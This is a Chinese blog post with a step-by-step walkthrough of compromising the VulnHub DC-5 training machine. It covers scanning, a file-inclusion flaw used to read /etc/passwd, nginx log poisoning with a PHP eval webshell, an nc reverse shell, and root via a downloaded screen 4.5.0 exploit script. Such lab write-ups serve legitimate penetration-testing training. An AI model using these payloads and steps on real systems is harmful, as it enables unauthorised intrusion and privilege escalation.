VulnHub靶机 DC-5 打靶 详细渗透过程

2024-04-27 892 0

VulnHub靶机 DC-5 打靶实战 详细渗透过程

一、将靶机导入到虚拟机当中

靶机地址:

https://download.vulnhub.com/dc/DC-5.zip

VulnHub靶机 DC-5 打靶 详细渗透过程插图

VulnHub靶机 DC-5 打靶 详细渗透过程插图1

二、渗透流程

主机发现

使用arp-scan命令或者nmap命令进行主机发现

arp-scan -l

VulnHub靶机 DC-5 打靶 详细渗透过程插图2

端口扫描

nmap -p- 192.168.43.192

得到开放了80,111,以及41237端口

VulnHub靶机 DC-5 打靶 详细渗透过程插图3

扫描端口服务详细信息:

nmap -p80,111,41237 -sV -A 192.168.43.192

VulnHub靶机 DC-5 打靶 详细渗透过程插图4

访问80端口的web服务:

VulnHub靶机 DC-5 打靶 详细渗透过程插图5

目录爆破

dirsearch -u http://192.168.43.192 -i 200

暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录

VulnHub靶机 DC-5 打靶 详细渗透过程插图6

在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动

VulnHub靶机 DC-5 打靶 详细渗透过程插图7

VulnHub靶机 DC-5 打靶 详细渗透过程插图8

在contact.php交互界面:

VulnHub靶机 DC-5 打靶 详细渗透过程插图9

跳转页同样也发生变化:

VulnHub靶机 DC-5 打靶 详细渗透过程插图10

文件包含

说明这几个目录都包含了/footer.php文件,再次尝试爆破目录

在/thankyou.php基础上爆破

dirsearch -u http://192.168.43.192/thankyou.php -e* -i 200

VulnHub靶机 DC-5 打靶 详细渗透过程插图11

访问:

VulnHub靶机 DC-5 打靶 详细渗透过程插图12

目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功

VulnHub靶机 DC-5 打靶 详细渗透过程插图13

当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破

wfuzz -w  /usr/share/wfuzz/wordlist/general/common.txt http://192.168.43.192/thankyou.php?FUZZ=/etc/passwd

VulnHub靶机 DC-5 打靶 详细渗透过程插图14

http://192.168.43.192/thankyou.php?file=/etc/passwd

VulnHub靶机 DC-5 打靶 详细渗透过程插图15

getshell

信息收集发现web服务器为nginx,尝试包含以下日志,查看以下

VulnHub靶机 DC-5 打靶 详细渗透过程插图16

//日志路径:
/var/log/nginx/access.log

VulnHub靶机 DC-5 打靶 详细渗透过程插图17

日志信息显示出来了,其中包括url和UA头信息,我们可将一句话木马写进UA头或者url的file参数后面当中,进行getshell

VulnHub靶机 DC-5 打靶 详细渗透过程插图18

测试是否可解析php语句

VulnHub靶机 DC-5 打靶 详细渗透过程插图19

成功解析,写入一句话木马

VulnHub靶机 DC-5 打靶 详细渗透过程插图20

<?php @eval($_POST['cmd']);?>

VulnHub靶机 DC-5 打靶 详细渗透过程插图21

VulnHub靶机 DC-5 打靶 详细渗透过程插图22

蚁剑连接,getshell

VulnHub靶机 DC-5 打靶 详细渗透过程插图23

反弹shell

在蚁剑的虚拟终端执行,bash反弹没有成功,使用nc命令反弹shell

VulnHub靶机 DC-5 打靶 详细渗透过程插图24

kali端开启监听

nc -lvvp 8888

成功接收到shell

VulnHub靶机 DC-5 打靶 详细渗透过程插图25

获取稳定shell

python -c "import pty;pty.spawn('/bin/bash')"

提权

//查找suid权限的命令
find / -perm -u=s -type f 2>/dev/null

发现存在一个screen的命令并且版本为4.5.0,搜索一下相关漏洞

VulnHub靶机 DC-5 打靶 详细渗透过程插图26

进行漏洞检索,然后进行漏洞利用

VulnHub靶机 DC-5 打靶 详细渗透过程插图27

目标存在wget命令,可进行文件下载,那么kail使用python开启一个http服务,使用wget下载下来

python3 -m http.server 8080

VulnHub靶机 DC-5 打靶 详细渗透过程插图28

可将两个文件都下载下来,进行查看

VulnHub靶机 DC-5 打靶 详细渗透过程插图29

给予sh文件执行权限,直接执行一下试试,成功提权

chmod u+x 41154.sh
./41154.sh

VulnHub靶机 DC-5 打靶 详细渗透过程插图30

文章不妥之处,欢迎批评指正!


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论